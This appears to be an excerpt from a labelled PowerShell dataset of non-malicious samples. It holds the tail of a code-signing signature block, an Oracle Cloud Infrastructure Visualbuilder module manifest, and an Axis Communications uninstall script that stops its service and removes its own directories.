MBQGA1UEBRMNMjMwMDEyKzUwMDUxNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAD21v9pHoLdBSNlFAjmk # mx4XxOZAPsVxxXbDyQv1+kGDe9XpgBnT1lXnx7JDpFMKBwAyIwdInmvhK9pGBa31 # TyeL3p7R2s0L8SABPPRJHAEk4NHpBXxHjm4TKjezAbSqqbgsy10Y7KApy+9UrKa2 # kGmsuASsk95PVm5vem7OmTs42vm0BJUU+JPQLg8Y/sdj3TtSfLYYZAaJwTAIgi7d # hzn5hatLo7Dhz+4T+MrFd+6LUa2U3zr97QwzDthx+RP9/RZnur4inzSQsG5DCVIM # pA1l2NWEA3KAca0tI2l6hQNYsaKL1kefdfHCrPxEry8onJjyGGv9YKoLv6AOO7Oh # JEmbQlz/xksYG2N/JSOJ+QqYpGTEuYFYVWain7He6jgb41JbpOGKDdE/b+V2q/gX # UgFe2gdwTpCDsvh8SMRoq1/BNXcr7iTAU38Vgr83iVtPYmFhZOVM0ULp/kKTVoir # IpP2KCxT4OekOctt8grYnhJ16QMjmMv5o53hjNFXOxigkQWYzUO+6w50g0FAeFa8 # 5ugCCB6lXEk21FFB1FdIHpjSQf+LP/W2OV/HfhC3uTPgKbRtXo83TZYEudooyZ/A # Vu08sibZ3MkGOJORLERNwKm2G7oqdOv4Qj8Z0JrGgMzj46NFKAxkLSpE5oHQYP1H # tPx1lPfD7iNSbJsP6LiUHXH1MIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAANOtTx6wYRv6ysAAAAAA04wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIA6l0jFVmVF52Ocluz6vDIjp # 0QBGUqu+lXa9AealFdkSMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAcrYgKpscboTYEdg+cB0WM5lhsZ7kgTSuASDV1UjVb9xIOzL5OHV6Rlce # 1OmI+YuOPqS02BNaRxcpwcwJQmUiKJ9to60eCPWAUJYJTxZIX3P4Y2Qe7lp6JU03 # 30O66eS4IoE0SLjO2QaB4JR2kcLddxTWaDzIz64uLzyDdXWDJ7Pu1DCCyEJXKLhU # iyxg3vSdtQOODSKQ5faly9HS/6OC9iXKI/I/cyUZTCF8C4XPTN+161HZjzABQgHm # oeReFOQxE7ZaImUxWH01tpHiHx1yzfTPhxfABHGlLZ4gVoDa/mqeCGOzvgcrf3LR # RNKha6w873744p5G/grWxUO3UWAYpKGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCB6rjQtumlqSVUztwLLrELYCl1oGJ++1UgxDAviK8DraAIGZJMsxab7 # GBMyMDIzMDcxODAxMTY1Ni4yNjFaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # Ojg2REYtNEJCQy05MzM1MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAG3IScaB6IqhkYAAQAAAbcwDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjIw # OTIwMjAyMjE0WhcNMjMxMjE0MjAyMjE0WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4NkRGLTRC # QkMtOTMzNTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAMf9z1dQNBNkTBq3HJclypjQ # cJIlDAgpvsw4vHJe06n532RKGkcn0V7p65OeA1wOoO+8NsopnjPpVZ8+4s/RhdMC # MNPQJXoWdkWOp/3puIEs1fzPBgTJrdmzdyUYzrAloICYx722gmdpbNf3P0y5Z2gR # O48sWIYyYeNJYch+ZfJzXqqvuvq7G8Nm8IMQi8Zayvx+5dSGBM5VYHBxCEjXF9EN # 6Qw7A60SaXjKjojSpUmpaM4FmVec985PNdSh8hOeP2tL781SBan92DT19tfNHv9H # 0FAmE2HGRwizHkJ//mAZdS0s6bi/UwPMksAia5bpnIDBOoaYdWkV0lVG5rN0+ltR # z9zjlaH9uhdGTJ+WiNKOr7mRnlzYQA53ftSSJBqsEpTzCv7c673fdvltx3y48Per # 6vc6UR5e4kSZsH141IhxhmRR2SmEabuYKOTdO7Q/vlvAfQxuEnJ93NL4LYV1IWw8 # O+xNO6gljrBpCOfOOTQgWJF+M6/IPyuYrcv79Lu7lc67S+U9MEu2dog0MuJIoYCM # iuVaXS5+FmOJiyfiCZm0VJsJ570y9k/tEQe6aQR9MxDW1p2F3HWebolXj9su7zrr # ElNlHAEvpFhcgoMniylNTiTZzLwUj7TH83gnugw1FCEVVh5U9lwNMPL1IGuz/3U+ # RT9wZCBJYIrFJPd6k8UtAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUs/I5Pgw0JAVh # DdYB2yPII8l4tOwwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAA2dZMybhVxSXTbJ # zFgvNiMCV5/Ayn5UuzJU495YDtcefold0ehR9QBGBhHmAMt10WYCHz2WQUyM3mQD # 4IsHfEL1JEwgG9tGq71ucn9dknLBHD30JvbQRhIKcvFSnvRCCpVpilM8F/YaWXC9 # VibSef/PU2GWA+1zs64VFxJqHeuy8KqrQyfF20SCnd8zRZl4YYBcjh9G0GjhJHUP # AYEx0r8jSWjyi2o2WAHD6CppBtkwnZSf7A68DL4OwwBpmFB3+vubjgNwaICS+fkG # VvRnP2ZgmlfnaAas8Mx7igJqciqq0Q6An+0rHj1kxisNdIiTzFlu5Gw2ehXpLrl5 # 9kvsmONVAJHhndpx3n/0r76TH+3WNS9UT9jbxQkE+t2thif6MK5krFMnkBICCR/D # VcV1qw9sg6sMEo0wWSXlQYXvcQWA65eVzSkosylhIlIZZLL3GHZD1LQtAjp2A5F7 # C3Iw4Nt7C7aDCfpFxom3ZulRnFJollPHb3unj9hA9xvRiKnWMAMpS4MZAoiV4O29 # zWKZdUzygp7gD4WjKK115KCJ0ovEcf92AnwMAXMnNs1o0LCszg+uDmiQZs5eR7jz # dKzVfF1z7bfDYNPAJvm5pSQdby3wIOsN/stYjM+EkaPtUzr8OyMwrG+jpFMbsB4c # fN6tvIeGtrtklMJFtnF68CcZZ5IAMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4 # NkRGLTRCQkMtOTMzNTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUAyGdBGMObODlsGBZmSUX2oWgfqcaggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOhf76swIhgPMjAyMzA3MTgwMDQ5NDdaGA8yMDIzMDcxOTAwNDk0N1owdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6F/vqwIBADAHAgEAAgIbEDAHAgEAAgIR4DAKAgUA # 6GFBKwIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBABLnL5nML5nazmlyt8+q # G3Y3aRfCTZMf9GwrNoDiVQx1FhiczUxOnT2DP83KDBRNutcvzffK3O9oVA3s8r2H # RX29VtHC8nzNM8+iGDiDeQneT+8MHwyTXs90TwuWy3nWX610kexmZfxgJxoIZby0 # wf8EruWdzvy4RznftlTLJ0lyMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAG3IScaB6IqhkYAAQAAAbcwDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQg1A9BrSEH74WqDXrKFDTrskLE65W0sBTYW5cYZVoFxxgwgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCBsJ3jTsh7aL8hNeiYGL5/8IBn8zUfr7/Q7rkM8ic1w # QTCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAABtyEn # GgeiKoZGAAEAAAG3MCIEIChwC3lRpcKRzHRcQFtFQH4SqUuvPSW7SDzJG1HUytF7 # MA0GCSqGSIb3DQEBCwUABIICABgBYwO440JSMbBbXaZpoKpAZeSmR7u+YOhF5iXn # 3EnMLEHn0qJQhNbIM77xK4TYDIsH2xfTInSE8vFvoRHqSYravvw4RLpW4DaUb1Ig # mRaGpZjJcU2IEKNJ96oaA2K3S8JJtkO+WRNZG+UKYtjSH/jdYsz4Yylu+VMkWRFn # aYtpqhmHVRBiTj47bw/6elmL+dR3JlGvsIX2Kj5A0p8aZ8Q4xa39+uX1yqxOycQo # TTxbAuV+nMtb/Are4ivahDlOA+yo/FmtFocg6794r+GQQobKPtdmp9lX//0iaGrX # nUTLUhMxS2RVy+MQtf0Lk/IXaUtr8YpgaUTtt3ucl2CNY+cvsnHUW+mnO1iNsaF7 # +oQXgOiPJFlQa7f2ZbYkzC4d6ReW55jws6SBjxrV1gZiP3a1n0C9hsxQPuPPGZ/N # jX/BzTNHyfI087pkr/m01UnL2wuEs+eKLtjo9hUemsPdJusO1U8hypwWhtQ0Ts/A # obdDiXEyRPmjfwMEPANilPO3i88Apa67h4C1+iefNUgyTnbyPujQughSEXF7zRNW # 7xxZ/E17WXI0SfKyqmrbstsNRYd7rp+Sz4SCsGtF0SNaQ0Ywu6eCIWEHm82U+LNL # d/0qH2Rfh7Hh+WhKCuSFl8Lc6mnh3R0MJrrYzLTYjZRsCas+KehWPXKAxsGQgtv9 # VNbz # SIG # End signature block
combined_dataset/train/non-malicious/sample_23_84.ps1
sample_23_84.ps1
# # Module manifest for module 'OCI.PSModules.Visualbuilder' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Visualbuilder.dll' # Version number of this module. ModuleVersion = '82.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '30071ced-fbc1-4b5d-9ea5-b0fb2ecea5bc' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Visualbuilder Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '82.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Visualbuilder.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIVisualbuilderVbInstance', 'Get-OCIVisualbuilderVbInstancesList', 'Get-OCIVisualbuilderWorkRequest', 'Get-OCIVisualbuilderWorkRequestErrorsList', 'Get-OCIVisualbuilderWorkRequestLogsList', 'Get-OCIVisualbuilderWorkRequestsList', 'Invoke-OCIVisualbuilderRequestSummarizedApplications', 'Move-OCIVisualbuilderVbInstanceCompartment', 'New-OCIVisualbuilderVbInstance', 'Remove-OCIVisualbuilderVbInstance', 'Start-OCIVisualbuilderVbInstance', 'Stop-OCIVisualbuilderVbInstance', 'Update-OCIVisualbuilderVbInstance' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Visualbuilder' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_17_59.ps1
sample_17_59.ps1
##---------------------------------------------------------------------------- ## Copyright (c) Axis Communications AB, SWEDEN. All rights reserved. ##---------------------------------------------------------------------------- # Import string constants . ./StringConstants.ps1 # Import shared functions and vars . ./Commonalities.ps1 Stop-Service -Name $ServiceConstants.serviceName Remove-Service -ServiceToRemove $ServiceConstants.serviceName # Get temporary scoped Environment variables from ACS component framework $dataPath = Get-DataPath $installationPath = Get-InstallationPath # Remove files when stopped if its an axis path Remove-AxisDirectory -AxisFilePath $dataPath Remove-AxisDirectory -AxisFilePath $installationPath # SIG # Begin signature block # MIIoIQYJKoZIhvcNAQcCoIIoEjCCKA4CAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBpzVb2Ni4mr+so # HX7QJ3UIWzYSPUcVkmMxSFV/IfT8gaCCDY4wggawMIIEmKADAgECAhAIrUCyYNKc # TJ9ezam9k67ZMA0GCSqGSIb3DQEBDAUAMGIxCzAJBgNVBAYTAlVTMRUwEwYDVQQK # EwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xITAfBgNV # BAMTGERpZ2lDZXJ0IFRydXN0ZWQgUm9vdCBHNDAeFw0yMTA0MjkwMDAwMDBaFw0z # NjA0MjgyMzU5NTlaMGkxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwg # 